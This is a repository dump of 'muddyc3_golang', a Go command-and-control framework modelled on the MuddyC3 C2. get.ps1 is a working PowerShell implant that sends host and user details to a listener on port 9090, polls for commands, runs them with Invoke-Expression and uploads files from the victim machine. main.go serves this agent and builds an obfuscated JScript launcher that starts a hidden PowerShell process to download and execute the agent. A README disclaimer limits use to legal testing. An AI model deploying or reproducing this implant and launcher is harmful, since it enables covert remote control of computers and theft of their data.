├── Modules └── calc-test.ps1 ├── bin ├── donut.exe ├── load.exe ├── 使用.txt ├── NET_load.exe └── run.bat ├── .gitignore ├── muddyc3-Revived.zip ├── go.mod ├── README.md ├── README.md.bak ├── get.ps1 ├── go.sum └── main.go /Modules/calc-test.ps1: -------------------------------------------------------------------------------- 1 | function calc-test 2 | { 3 | start-process calc 4 | } -------------------------------------------------------------------------------- /bin/donut.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/demonsec666/muddyc3_golang/HEAD/bin/donut.exe -------------------------------------------------------------------------------- /bin/load.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/demonsec666/muddyc3_golang/HEAD/bin/load.exe -------------------------------------------------------------------------------- /bin/使用.txt: -------------------------------------------------------------------------------- 1 | 测试文件 警告 2 | 运行run.bat输入ip 3 | 生成.bin文件 4 | 可以用load.exe加载.bin文件 5 | 6 | 这是测试中的测试 -------------------------------------------------------------------------------- /.gitignore: -------------------------------------------------------------------------------- 1 | /.idea 2 | /run.bat 3 | /test.go 4 | /main.exe 5 | /test.py 6 | /test1.go 7 | /NET_load -------------------------------------------------------------------------------- /bin/NET_load.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/demonsec666/muddyc3_golang/HEAD/bin/NET_load.exe -------------------------------------------------------------------------------- /muddyc3-Revived.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/demonsec666/muddyc3_golang/HEAD/muddyc3-Revived.zip 
-------------------------------------------------------------------------------- /bin/run.bat: -------------------------------------------------------------------------------- 1 | @echo off 2 | echo.set ip 3 | set /p input_source= 4 | donut.exe NET_load.exe -c NET_load.Program -m Main -p input_source -------------------------------------------------------------------------------- /go.mod: -------------------------------------------------------------------------------- 1 | module github.com/demonsec666/muddyc3_golang 2 | 3 | go 1.12 4 | 5 | require ( 6 | github.com/AlecAivazis/survey/v2 v2.0.5 // indirect 7 | github.com/axgle/mahonia v0.0.0-20180208002826-3358181d7394 // indirect 8 | github.com/c-bata/go-prompt v0.2.3 // indirect 9 | github.com/fatih/color v1.9.0 // indirect 10 | github.com/mattn/go-tty v0.0.3 // indirect 11 | github.com/olekukonko/tablewriter v0.0.4 // indirect 12 | github.com/pkg/term v0.0.0-20190109203006-aa71e9d9e942 // indirect 13 | ) 14 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # muddyc3_golang 2 | 本项目是根据泄漏的ahmedkhlief MuddyC3 C2的POC使用golang编写的框架。原版框架地址:[muddyc3-Revived](https://github.com/ahmedkhlief/muddyc3-Revived) 3 | Demo请见:[Youtube](https://youtu.be/NWwOFiBzNXk) 4 | 5 | #WIKI 6 | https://github.com/demonsec666/muddyc3_golang/wiki 7 | 8 | #release 9 | https://github.com/demonsec666/muddyc3_golang/releases 10 | 11 | 12 | #主要功能 13 | 1. 交互式命令行 14 | 2. 可加载模块 15 | 3. 创建Windows PowerShell负载 16 | 4. 
远程上传下载功能 17 | 18 | # 框架运行图片 19 | ![][1] 20 | ![][2] 21 | ![][3] 22 | ![][4] 23 | ![][5] 24 | ![][6] 25 | 26 | # 开发人员名单 27 | + [WBGIII](https://github.com/WBGlIl) 28 | + [demonsec666](https://github.com/demonsec666) 29 | + [c4dr01d](https://github.com/c4dr01d) 30 | 31 | # 关于框架使用 32 | 本框架仅供网络安全学习、参考以及合法测试,不合理使用本项目所提供之功能而造成的任何直接或间接的后果以及损失,均由使用者承担,即刻安全以及参加本项目的开发者不为此承担任何责任。 33 | 34 | This framework is for cyber security research, reference and legitimate testing only. 35 | Any direct or indirect consequences and losses arising from the abuse of the features provided by this framework are the responsibility of the user; secist and the author of this framework do not accept any responsibility. 36 | 37 | [1]: https://demonsec666.oss-cn-qingdao.aliyuncs.com/B49CE57927F122B7EA4921F47F321D77.jpg 38 | [2]: https://demonsec666.oss-cn-qingdao.aliyuncs.com/CA7F0BB98761EF4426EB1D7FA7E223CD.jpg 39 | [3]: https://demonsec666.oss-cn-qingdao.aliyuncs.com/9311DF125870D1C86BF186D5AA8C532C.jpg 40 | [4]: https://demonsec666.oss-cn-qingdao.aliyuncs.com/2CA777D7D57FFD6C177C9261523B601E.jpg 41 | [5]: https://demonsec666.oss-cn-qingdao.aliyuncs.com/CD10755C877B212D160EBE7762FA7297.jpg 42 | [6]: https://demonsec666.oss-cn-qingdao.aliyuncs.com/1580572393517.jpg 43 | -------------------------------------------------------------------------------- /README.md.bak: -------------------------------------------------------------------------------- 1 | # 1.Python版 2 | 3 | Python 版 开源项目 https://github.com/ahmedkhlief/muddyc3-Revived 4 | 5 | 6 | 7 | 8 | 9 | 10 | 11 | # 2.golang版 12 | 13 | golang 版 开源项目 https://github.com/demonsec666/muddyc3_golang 14 | 15 | 这是根据泄漏的ahmedkhlief MuddyC3 C2的工作POC。现在包括以下功能: 16 | 17 | 作者: WBGIII 18 | 19 | 20 | 21 | 蹭饭系列作者: Demon666 22 | 23 | ![enter description here][1] 24 | 25 | # 26 | 27 | ## 1.代理重新连接 28 | 29 | ![enter description here][2] 30 | 31 | 32 | 33 | ## 2. 加载模块 34 | 35 | ![enter description here][3] 36 | 37 | ## 3. 发送命令和接收结果 38 | 39 | 40 | 41 | ## 4. 
创建Powershell负载 ----(已实现一半,还未增加到服务端)目前只有get.ps1 代码复制到客户端,进行测试 42 | 43 | 44 | 45 | ## 5.已实现Download 功能,但待修复upload功能(有部分bug) 46 | 47 | ![enter description here][4] 48 | 49 | ## 已更新增加 50 | ``` 51 | 1. help 52 | 2. info 53 | 3. exit 54 | 4. Interact with AGENT 55 | 5. session list 56 | 57 | 58 | ``` 59 | 60 | ![enter description here][5] 61 | 62 | 63 | ![enter description here][6] 64 | 65 | 66 | 67 | 68 | 69 | [Demo](https://youtu.be/NWwOFiBzNXk) 70 | 71 | ## 待增加功能版: 72 | 73 | ``` 74 | 需修复upload bug 75 | 76 | 77 | 78 | 79 | 80 | ``` 81 | 82 | 83 | 84 | ## 用法: 85 | 86 | ``` 87 | 1. go get github.com/axgle/mahonia go get github.com/olekukonko/tablewriter 88 | 2. go run main (PORT:9090) 89 | 3. 复制get.ps1 代码到客户端 (并修改ip和端口) 90 | 4. 在控制台可直接输入命令 91 | 5. 或者在控制台输入 load xxxx.ps1 or Download serverfile clientfile 92 | 6. load 即加载 Modules 文件夹中的文件 93 | 7. Download 需创建file文件夹,再使用命令Download serverfile(指的是file下的文件 相对路径) clientfile (客户端的绝对路径) 94 | ``` 95 | 96 | 97 | 98 | # 敬告(Notice): 99 | + 仅供学习参考,做测试 100 | 101 | + 不合理使用此项目所提供的功能而造成的任何直接或者间接的后果及损失, 均由使用者本人负责,即刻安全以及创作者不为此承担任何责任。 102 | 103 | 104 | + For reference only, for testing 105 | 106 | + Any direct or indirect consequences and losses arising from the abuse of the features provided by this project are the responsibility of the user; secist and the author do not accept any responsibility. 
107 | 108 | 109 | [1]: https://demonsec666.oss-cn-qingdao.aliyuncs.com/B49CE57927F122B7EA4921F47F321D77.jpg 110 | [2]: https://demonsec666.oss-cn-qingdao.aliyuncs.com/CA7F0BB98761EF4426EB1D7FA7E223CD.jpg 111 | [3]: https://demonsec666.oss-cn-qingdao.aliyuncs.com/9311DF125870D1C86BF186D5AA8C532C.jpg 112 | [4]: https://demonsec666.oss-cn-qingdao.aliyuncs.com/2CA777D7D57FFD6C177C9261523B601E.jpg 113 | [5]: https://demonsec666.oss-cn-qingdao.aliyuncs.com/CD10755C877B212D160EBE7762FA7297.jpg 114 | [6]: https://demonsec666.oss-cn-qingdao.aliyuncs.com/1580572393517.jpg -------------------------------------------------------------------------------- /get.ps1: -------------------------------------------------------------------------------- 1 | $hostname = $env:COMPUTERNAME; 2 | $whoami = $env:USERNAME; 3 | $arch = (Get-WmiObject Win32_OperatingSystem).OSArchitecture 4 | $os = (Get-WmiObject -class Win32_OperatingSystem).Caption; 5 | $domain = (Get-WmiObject Win32_ComputerSystem).Domain; 6 | $IP = (gwmi -query "Select IPAddress From Win32_NetworkAdapterConfiguration Where IPEnabled = True").IPAddress[0] 7 | $random = -join ((65 .. 
90) | Get-Random -Count 5 | % { [char]$_ }); 8 | $agent = "$random-img.jpeg" 9 | $finaldata = "$os**$IP**$arch**$hostname**$domain**$whoami" 10 | $h3 = new-object net.WebClient 11 | $h3.Headers.Add("Content-Type", "application/x-www-form-urlencoded") 12 | $h = $h3.UploadString("http://{ip}:9090/info/$agent", "data="+$finaldata) 13 | 14 | $h2 = New-Object system.Net.WebClient; 15 | $h3 = New-Object system.Net.WebClient; 16 | 17 | 18 | function load($module) 19 | { 20 | 21 | 22 | 23 | $handle = new-object net.WebClient; 24 | $handleh = $handle.Headers; 25 | $handleh.add("Content-Type", "application/x-www-form-urlencoded"); 26 | $modulecontent = $handle.UploadString("http://{ip}:9090/md/$agent", "data="+"$module"); 27 | 28 | 29 | 30 | return $modulecontent 31 | } 32 | 33 | function Download($file) 34 | { 35 | 36 | 37 | 38 | $handle = new-object net.WebClient; 39 | $handleh = $handle.Headers; 40 | $handleh.add("Content-Type", "application/x-www-form-urlencoded"); 41 | $modulecontent = $handle.UploadString("http://{ip}:9090/up/$agent", "data="+"$file"); 42 | return $modulecontent 43 | } 44 | 45 | function upload($file) 46 | { 47 | 48 | 49 | 50 | $handle = new-object net.WebClient; 51 | $handleh = $handle.Headers; 52 | $handleh.add("Content-Type", "application/x-www-form-urlencoded"); 53 | $modulecontent = $handle.UploadString("http://{ip}:9090/img/$agent", "data="+"$file"); 54 | return $modulecontent 55 | } 56 | 57 | 58 | while ($true) 59 | { 60 | $cmd = $h2.downloadString("http://{ip}:9090/cm/$agent"); 61 | #echo $cmd 62 | if ($cmd -eq "REGISTER") 63 | { 64 | $h3 = new-object net.WebClient 65 | $h3.Headers.Add("Content-Type", "application/x-www-form-urlencoded") 66 | $h3.UploadString("http://{ip}:9090/info/$agent", "data="+$finaldata) 67 | continue 68 | } 69 | if ($cmd -eq "") 70 | { 71 | sleep 2 72 | continue 73 | } 74 | elseif ($cmd.split(" ")[0] -eq "load") 75 | { 76 | $f = $cmd.split(" ")[1] 77 | $module = load -module $f 78 | try 79 | { 80 | $output = 
Invoke-Expression ($module) | Out-String 81 | } 82 | catch 83 | { 84 | $output = $Error[0] | Out-String; 85 | } 86 | 87 | 88 | } 89 | elseif ($cmd.split(" ")[0] -eq "download") 90 | { 91 | try 92 | { 93 | $file = $cmd.split(" ")[1] 94 | echo $file 95 | $path = $cmd.split(" ")[2] 96 | echo $path 97 | $filedata=Download -file $file 98 | $bytes = [Convert]::FromBase64String($filedata) 99 | [IO.File]::WriteAllBytes($path, $bytes) 100 | $output="download file to $path" 101 | } 102 | catch 103 | { 104 | $output = "err download file" 105 | } 106 | 107 | } 108 | elseif ($cmd.split(" ")[0] -eq "upload") 109 | { 110 | try 111 | { 112 | $path = $cmd.split(" ")[1] 113 | #echo $file 114 | $filedata=[IO.File]::ReadAllBytes($path) 115 | $bytes = [Convert]::ToBase64String($filedata) 116 | echo $bytes 117 | $output=upload -file $bytes 118 | } 119 | catch 120 | { 121 | $output = "err upload file" 122 | } 123 | 124 | } 125 | 126 | else 127 | { 128 | 129 | try 130 | { 131 | $output = Invoke-Expression ($cmd) | Out-String 132 | } 133 | catch 134 | { 135 | #$output = $Error[0] | Out-String; 136 | } 137 | } 138 | #Echo $output 139 | $bytes = [System.Text.Encoding]::UTF8.GetBytes($output) 140 | $redata = [System.Convert]::ToBase64String($bytes) 141 | $h3.Headers.Add("Content-Type", "application/x-www-form-urlencoded") 142 | $re = $h3.UploadString("http://{ip}:9090/re/$agent", "data="+$redata); 143 | 144 | } 145 | 146 | -------------------------------------------------------------------------------- /go.sum: -------------------------------------------------------------------------------- 1 | github.com/AlecAivazis/survey/v2 v2.0.5 h1:xpZp+Q55wi5C7Iaze+40onHnEkex1jSc34CltJjOoPM= 2 | github.com/AlecAivazis/survey/v2 v2.0.5/go.mod h1:WYBhg6f0y/fNYUuesWQc0PKbJcEliGcYHB9sNT3Bg74= 3 | github.com/Netflix/go-expect v0.0.0-20180615182759-c93bf25de8e8/go.mod h1:oX5x61PbNXchhh0oikYAH+4Pcfw5LKv21+Jnpr6r6Pc= 4 | github.com/axgle/mahonia v0.0.0-20180208002826-3358181d7394 
h1:OYA+5W64v3OgClL+IrOD63t4i/RW7RqrAVl9LTZ9UqQ= 5 | github.com/axgle/mahonia v0.0.0-20180208002826-3358181d7394/go.mod h1:Q8n74mJTIgjX4RBBcHnJ05h//6/k6foqmgE45jTQtxg= 6 | github.com/c-bata/go-prompt v0.2.3 h1:jjCS+QhG/sULBhAaBdjb2PlMRVaKXQgn+4yzaauvs2s= 7 | github.com/c-bata/go-prompt v0.2.3/go.mod h1:VzqtzE2ksDBcdln8G7mk2RX9QyGjH+OVqOCSiVIqS34= 8 | github.com/davecgh/go-spew v1.1.1/go.mod h1:J7Y8YcW2NihsgmVo/mv3lAwl/skON4iLHjSsI+c5H38= 9 | github.com/fatih/color v1.9.0 h1:8xPHl4/q1VyqGIPif1F+1V3Y3lSmrq01EabUW3CoW5s= 10 | github.com/fatih/color v1.9.0/go.mod h1:eQcE1qtQxscV5RaZvpXrrb8Drkc3/DdQ+uUYCNjL+zU= 11 | github.com/hinshun/vt10x v0.0.0-20180616224451-1954e6464174/go.mod h1:DqJ97dSdRW1W22yXSB90986pcOyQ7r45iio1KN2ez1A= 12 | github.com/kballard/go-shellquote v0.0.0-20180428030007-95032a82bc51 h1:Z9n2FFNUXsshfwJMBgNA0RU6/i7WVaAegv3PtuIHPMs= 13 | github.com/kballard/go-shellquote v0.0.0-20180428030007-95032a82bc51/go.mod h1:CzGEWj7cYgsdH8dAjBGEr58BoE7ScuLd+fwFZ44+/x8= 14 | github.com/kr/pty v1.1.4/go.mod h1:pFQYn66WHrOpPYNljwOMqo10TkYh1fy3cYio2l3bCsQ= 15 | github.com/mattn/go-colorable v0.1.2/go.mod h1:U0ppj6V5qS13XJ6of8GYAs25YV2eR4EVcfRqFIhoBtE= 16 | github.com/mattn/go-colorable v0.1.4 h1:snbPLB8fVfU9iwbbo30TPtbLRzwWu6aJS6Xh4eaaviA= 17 | github.com/mattn/go-colorable v0.1.4/go.mod h1:U0ppj6V5qS13XJ6of8GYAs25YV2eR4EVcfRqFIhoBtE= 18 | github.com/mattn/go-isatty v0.0.8/go.mod h1:Iq45c/XA43vh69/j3iqttzPXn0bhXyGjM0Hdxcsrc5s= 19 | github.com/mattn/go-isatty v0.0.10/go.mod h1:qgIWMr58cqv1PHHyhnkY9lrL7etaEgOFcMEpPG5Rm84= 20 | github.com/mattn/go-isatty v0.0.11 h1:FxPOTFNqGkuDUGi3H/qkUbQO4ZiBa2brKq5r0l8TGeM= 21 | github.com/mattn/go-isatty v0.0.11/go.mod h1:PhnuNfih5lzO57/f3n+odYbM4JtupLOxQOAqxQCu2WE= 22 | github.com/mattn/go-runewidth v0.0.6/go.mod h1:H031xJmbD/WCDINGzjvQ9THkh0rPKHF+m2gUSrubnMI= 23 | github.com/mattn/go-runewidth v0.0.7 h1:Ei8KR0497xHyKJPAv59M1dkC+rOZCMBJ+t3fZ+twI54= 24 | github.com/mattn/go-runewidth v0.0.7/go.mod 
h1:H031xJmbD/WCDINGzjvQ9THkh0rPKHF+m2gUSrubnMI= 25 | github.com/mattn/go-tty v0.0.3 h1:5OfyWorkyO7xP52Mq7tB36ajHDG5OHrmBGIS/DtakQI= 26 | github.com/mattn/go-tty v0.0.3/go.mod h1:ihxohKRERHTVzN+aSVRwACLCeqIoZAWpoICkkvrWyR0= 27 | github.com/mgutz/ansi v0.0.0-20170206155736-9520e82c474b h1:j7+1HpAFS1zy5+Q4qx1fWh90gTKwiN4QCGoY9TWyyO4= 28 | github.com/mgutz/ansi v0.0.0-20170206155736-9520e82c474b/go.mod h1:01TrycV0kFyexm33Z7vhZRXopbI8J3TDReVlkTgMUxE= 29 | github.com/olekukonko/tablewriter v0.0.4 h1:vHD/YYe1Wolo78koG299f7V/VAS08c6IpCLn+Ejf/w8= 30 | github.com/olekukonko/tablewriter v0.0.4/go.mod h1:zq6QwlOf5SlnkVbMSr5EoBv3636FWnp+qbPhuoO21uA= 31 | github.com/pkg/term v0.0.0-20190109203006-aa71e9d9e942/go.mod h1:eCbImbZ95eXtAUIbLAuAVnBnwf83mjf6QIVH8SHYwqQ= 32 | github.com/pmezard/go-difflib v1.0.0/go.mod h1:iKH77koFhYxTK1pcRnkKkqfTogsbg7gZNVY4sRDYZ/4= 33 | github.com/stretchr/testify v1.2.1/go.mod h1:a8OnRcib4nhh0OaRAV+Yts87kKdq0PP7pXfy6kDkUVs= 34 | golang.org/x/crypto v0.0.0-20190308221718-c2843e01d9a2/go.mod h1:djNgcEr1/C05ACkg1iLfiJU5Ep61QUkGW8qpdssI0+w= 35 | golang.org/x/crypto v0.0.0-20190530122614-20be4c3c3ed5/go.mod h1:yigFU9vqHzYiE8UmvKecakEJjdnWj3jj499lnFckfCI= 36 | golang.org/x/net v0.0.0-20190404232315-eb5bcb51f2a3/go.mod h1:t9HGtf8HONx5eT2rtn7q6eTqICYqUVnKs3thJo3Qplg= 37 | golang.org/x/sync v0.0.0-20190911185100-cd5d95a43a6e/go.mod h1:RxMgew5VJxzue5/jJTE5uejpjVlOe/izrB70Jof72aM= 38 | golang.org/x/sys v0.0.0-20190215142949-d0b11bdaac8a/go.mod h1:STP8DvDyc/dI5b8T5hshtkjS+E42TnysNCUPdjciGhY= 39 | golang.org/x/sys v0.0.0-20190222072716-a9d3bda3a223/go.mod h1:STP8DvDyc/dI5b8T5hshtkjS+E42TnysNCUPdjciGhY= 40 | golang.org/x/sys v0.0.0-20190412213103-97732733099d/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs= 41 | golang.org/x/sys v0.0.0-20190530182044-ad28b68e88f1/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs= 42 | golang.org/x/sys v0.0.0-20191008105621-543471e840be/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs= 43 | golang.org/x/sys 
v0.0.0-20191026070338-33540a1f6037/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs=
golang.org/x/sys v0.0.0-20191120155948-bd437916bb0e/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs=
golang.org/x/text v0.3.0/go.mod h1:NqM8EUOU14njkJ3fqMW+pc6Ldnwhi/IjpwHt7yyuwOQ=

-------------------------------------------------------------------------------- /main.go: --------------------------------------------------------------------------------
// Listener side of the muddyc3_golang framework (module name from go.mod):
// one cleartext HTTP handler on :9090 that the get.ps1 agent polls, plus an
// interactive console that shares package-level state with the handlers.
// The HTTP server runs in its own goroutine (see main) while the console runs
// on the main goroutine; no synchronization is in view anywhere in this file.
package main

import (
	"bufio"
	"encoding/base64"
	"fmt"
	"io/ioutil"
	"math/rand"
	"net/http"
	"os"
	"os/exec"
	"regexp"
	"runtime"
	"strings"
	"time"

	"github.com/AlecAivazis/survey/v2"
	"github.com/fatih/color"
	"github.com/olekukonko/tablewriter"

	"github.com/axgle/mahonia" // GBK decoding of the text an agent sends to /info
	"github.com/c-bata/go-prompt" // tab-completed drop-down prompt for the console
)

// help_shell is printed by Scanf when "help" is typed at the Console_shell prompt.
const help_shell = `
help Help menu
info List os Info
load load Moudle ps1 file
upload upload info
back return Home
exit Uninstall client
`

// help is printed by Options when "help" is typed at the top-level "SSF >" prompt.
const help = `
help Help menu
set Host Setting IP address
session list List os Info
Interact Use session ID
shell Shell => powershell.exe
exit Exit the program
`

var (
	OS, Arch, IP, hostname, domain, username string // scratch columns overwritten per agent by info_os(); read nowhere else in view
	cmd                                      = ""   // next command for the selected session; set by Scanf, consumed once by the /cm handler
	AGENTS                                   map[string]string // agent id -> raw "**"-separated host info string; written by /info, read/deleted by the console
	session_id                               = ""   // id whose /cm polls receive cmd; set by Session_id and del_session
	Host                                     = ""   // listener IP typed into Hosts(); substituted into get.ps1 and the /hjf page
	back                                     = ""   // "back" sentinel set by Scanf to leave the Console_shell loop
	// code is the page template returned by /hjf; its body is empty in this
	// listing (presumably stripped from the dump), so the "{code}" placeholder
	// that httpserver replaces cannot be seen here — confirm against the file.
	code = `







`
	// Package-level state: shared by the handler goroutines and the console
	// goroutine with no lock. AGENTS in particular is a plain map written
	// from HTTP handlers and read/deleted from Options (data race).
)

// GetRandomString returns l characters drawn from [0-9a-z] using a fresh
// math/rand source seeded from the clock on every call. Used only to name
// files written by the /img handler; it is not a cryptographic generator.
func GetRandomString(l int) string {
	str := "0123456789abcdefghijklmnopqrstuvwxyz"
	bytes := []byte(str)
	result := []byte{}
	r := rand.New(rand.NewSource(time.Now().UnixNano()))
	for i := 0; i < l; i++ {
		result = append(result, bytes[r.Intn(len(bytes))])
	}
	return string(result)
}

// replace turns every space in web_data back into '+'. Presumably undoing
// the form decoding of a base64 value (where '+' became ' ') before it is
// passed to DecodeString — confirm against get.ps1, which sends the value
// unescaped. The single-space regexp is recompiled on every call and its
// error discarded; strings.ReplaceAll would do the same job.
func replace(web_data string) string {
	reg, _ := regexp.Compile(" ")
	data := reg.ReplaceAllString(web_data, "+")
	return data
}

// str_replace replaces every match of the regular expression reg_str in data
// with str. The pattern is compiled per call and the compile error is
// dropped, so an invalid reg_str would leave reg nil and panic on use.
// Callers below pass literal fragments such as `{ip}` and `\n`, which are
// interpreted as regexps, not plain text.
func str_replace(data string, reg_str string, str string) string {
	reg, _ := regexp.Compile(reg_str)
	str_data := reg.ReplaceAllString(data, str)
	return str_data
}

// httpserver is the single handler registered for "/" in main, so every
// request on :9090 lands here. Routing uses unanchored regexps: "/info/*"
// matches any path that contains "/info" (the "*" applies only to the
// trailing "/"), and the branches are tested in the order info, cm, re, md,
// up, img, get, hjf — the first match wins.
//
// Agent protocol as visible in this file and in get.ps1 (all cleartext HTTP,
// the agent sends a form-encoded "data" field):
//   /info/<ID>  registration; body is GBK text stored verbatim in AGENTS[ID]
//   /cm/<ID>    poll; returns the pending cmd if ID is the selected session,
//               "" otherwise, and "REGISTER" if ID is unknown
//   /re/<ID>    agent posts base64 command output, printed to stdout
//   /md         serves ./Modules/<name>, name taken from the request body
//   /up         serves ./file/<name>, base64-encoded
//   /img        stores the base64 body under ./upload/<5 random chars>
//   /get        serves ./get.ps1 with "{ip}" replaced by Host
//   /hjf        serves the code template with an encoded launcher spliced in
//
// <ID> is the first run of capital letters in the path (the agent generates
// five of them; see get.ps1). It is only a map key — nothing authenticates
// the caller. get.ps1 polls /cm every 2 seconds while idle, which together
// with the fixed port and paths is the observable traffic pattern.
func httpserver(w http.ResponseWriter, r *http.Request) {
	//r.Body = http.MaxBytesReader(w, r.Body, MaxFileSize)
	r.ParseForm() // error ignored; a malformed body simply yields empty form values

	// URL matchers, recompiled on every request; Compile errors are dropped
	// (the patterns are constant, so they cannot fail).
	url_info, _ := regexp.Compile("/info/*")
	url_md, _ := regexp.Compile("/md/*")
	url_cm, _ := regexp.Compile("/cm/*")
	url_re, _ := regexp.Compile("/re/*")
	url_up, _ := regexp.Compile("/up/*")
	url_img, _ := regexp.Compile("/img/*")
	url_get, _ := regexp.Compile("/get")
	url_hjf, _ := regexp.Compile("/hjf")

	// info: agent registration / host inventory
	if url_info.MatchString(r.URL.Path) {
		data := mahonia.NewDecoder("gbk").ConvertString(string(r.Form.Get("data")))
		url_path, _ := regexp.Compile(`[A-Z]+`)
		id := url_path.FindString(r.URL.Path)
		AGENTS[id] = data // unsynchronized write from a handler goroutine (see var block)
		fmt.Println(data)

		// cm: hand the pending command to the selected agent
	} else if url_cm.MatchString(r.URL.Path) {
		url_path, _ := regexp.Compile(`[A-Z]+`)
		var id = url_path.FindString(r.URL.Path)
		//fmt.Println(id)
		// Two checks: (1) is the id registered at all,
		// (2) is it the session the operator selected with Interact.
		/*
			Only the selected session ever receives cmd.
		*/
		_, ok := AGENTS[id]
		if ok {
			if id == session_id {
				if cmd != "" {
					fmt.Fprint(w, cmd)
					cmd = "" // cleared on hand-out, so each command is delivered at most once
					_ = r.Close // no-op: reads the Request.Close field and discards it
				} else {
					fmt.Fprint(w, "")
				}
			} else {
				fmt.Fprint(w, "")
			}
		} else {
			fmt.Fprintf(w, "REGISTER") // unknown id: agent re-posts its /info record
		}

		// re: command output coming back from the agent
	} else if url_re.MatchString(r.URL.Path) {
		web_data := r.PostFormValue("data")
		decoded, _ := base64.StdEncoding.DecodeString(replace(web_data)) // decode error ignored; garbage prints partially or empty
		decodestr := string(decoded)
		fmt.Println(decodestr)

		// md: serve a PowerShell module from ./Modules (the agent's "load" verb)
	} else if url_md.MatchString(r.URL.Path) {
		web_data := r.Form.Get("data")
		// File name is the request body joined onto ./Modules/ by plain
		// concatenation; no validation of the name is in view.
		file_data, err := ioutil.ReadFile("./Modules/" + web_data)
		if err != nil {
			fmt.Println("Error reading module file", err)
			fmt.Fprintf(w, "")
			return
		} else { // else is redundant after the return above
			fmt.Fprintf(w, string(file_data))
		}

		// up: send a file from ./file to the agent, base64-encoded (agent's "download" verb)
	} else if url_up.MatchString(r.URL.Path) {
		web_data := r.Form.Get("data")
		// Same concatenation pattern as /md; ./file must exist on the server.
		file_data, err := ioutil.ReadFile("./file/" + web_data)
		if err != nil {
			fmt.Println("Read file error", err)
			fmt.Fprintf(w, "")
			return
		} else {
			encodeString := base64.StdEncoding.EncodeToString(file_data)
			fmt.Fprintf(w, encodeString)
		}

		// img: receive a base64 file from the agent and store it under ./upload (agent's "upload" verb)
	} else if url_img.MatchString(r.URL.Path) {
		web_data := r.Form.Get("data")
		decoded, _ := base64.StdEncoding.DecodeString(replace(web_data))
		//decodestr := string(decoded)

		// Create error is discarded: if ./upload is missing, file is nil, the
		// Write/Close below fail silently and the agent still receives "ok upload".
		file, _ := os.Create("./upload/" + GetRandomString(5))
		file.Write(decoded)
		file.Close()
		fmt.Fprintf(w, "ok upload")

	} else if url_get.MatchString(r.URL.Path) {
		// get: serve the get.ps1 agent script with "{ip}" filled in from Host
		ps1, err := ioutil.ReadFile("./get.ps1")
		payload := strings.Replace(string(ps1), "{ip}", Host, -1) // used before err is checked; harmless since ps1 is nil on error
		if err != nil {
			fmt.Println("Read file error", err)
			fmt.Fprintln(w, "")
			return
		} else {
			fmt.Fprintln(w, payload)
		}
	} else if url_hjf.MatchString(r.URL.Path) {
		// hjf: the JScript below is filled with Host and the fixed port,
		// base64-encoded, passed through the character substitution in reg,
		// and spliced into the code template. The decoding counterpart is
		// presumably in the stripped template body — cannot be verified here.
		js := `

var cm="powershell -exec bypass -w 1 -c $V=new-object net.webclient;$V.proxy=[Net.WebRequest]::GetSystemWebProxy();$V.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX($V.downloadstring('http://{ip}:{port}/get'));";
var w32ps= GetObject('winmgmts:').Get('Win32_ProcessStartup');
w32ps.SpawnInstance_();
w32ps.ShowWindow=0;
var rtrnCode=GetObject('winmgmts:').Get('Win32_Process').Create(cm,'c:\\',w32ps,null);
`
		js = str_replace(js, `{ip}`, Host)
		js = str_replace(js, `{port}`, "9090") // port is hard-coded here, in Hosts and in main
		js = base64.StdEncoding.EncodeToString([]byte(js))
		js = str_replace(js, `\n`, "") // raw-string `\n` is the newline regexp; base64 output has none, so this is a no-op
		// Each entry maps one base64 alphabet character (value) to a symbol
		// outside the alphabet (key); the targets are disjoint, so the random
		// map iteration order below does not change the result.
		reg := map[string]string{
			"]": "=",
			"[": "a",
			",": "b",
			"@": "D",
			"-": "x",
			"~": "N",
			"*": "E",
			"%": "C",
			"$": "H",
			"!": "G",
			"{": "K",
			"}": "O",
		}
		for k, v := range reg {
			js = str_replace(js, v, k)
		}
		// Mutates the package-level template in place: after the first
		// request "{code}" is gone, so every later response repeats the first
		// one even if Host has since changed — presumably unintended.
		code = strings.Replace(code, `{code}`, js, 1)
		//fmt.Print(code)
		fmt.Fprint(w, code)
	} else {
		fmt.Fprintf(w, "") // unmatched paths get an empty 200
	}
}

// info_os prints one table per registered agent. Each AGENTS value is split
// on "**" and must carry at least six fields in the order os, ip, arch,
// hostname, domain, username (the order get.ps1 builds into $finaldata);
// a shorter record panics on the index. The package-level OS/IP/... vars are
// overwritten on every iteration and are not read anywhere else in this
// file. Iterates the map without a lock while handlers may be writing it.
func info_os() {

	for k, v := range AGENTS {
		info := strings.Split(v, "**")
		OS = info[0]
		IP = info[1]
		Arch = info[2]
		hostname = info[3]
		domain = info[4]
		username = info[5]
		// one row per agent, keyed by its id
		data := [][]string{
			{k, OS, IP, Arch, hostname, domain, username},
		}
		// render the row as a table on stdout
		table := tablewriter.NewWriter(os.Stdout)
		table.SetHeader([]string{"ID", "Os Version", "IP Address ", "x86 OR x64", "ComputerName", "domain", "Username"})

		for _, v := range data {
			table.Append(v)
		}
		table.Render() // Send output
	}

}

//---------------------------------------------------------------
// Hosts prompts for the listener IP (stored in the package-level Host, which
// httpserver substitutes into /get and /hjf responses) and prints a set of
// ready-made launcher commands that all fetch from http://Host:9090/get or
// /hjf. The AskOne error is ignored. payload and payload_JOB are the same
// string, so commandP reusing encoded instead of encoded_JOB prints identical
// output. Port 9090 is hard-coded, matching main and httpserver.
func Hosts() {

	Blue := color.New(color.FgBlue).SprintFunc() // colour helpers, see https://github.com/fatih/color
	red := color.New(color.FgRed).SprintFunc()

	prompt := &survey.Input{
		Message: "set ip",
	}

	survey.AskOne(prompt, &Host, survey.WithIcons(func(icons *survey.IconSet) {

		icons.Question.Text = "メ "
		icons.Question.Format = "red+hb"

	}))
	fmt.Printf("%s setting listener => %s:9090 \n", Blue("[*]"), Host) //https://github.com/fatih/color
	fmt.Println("\n")
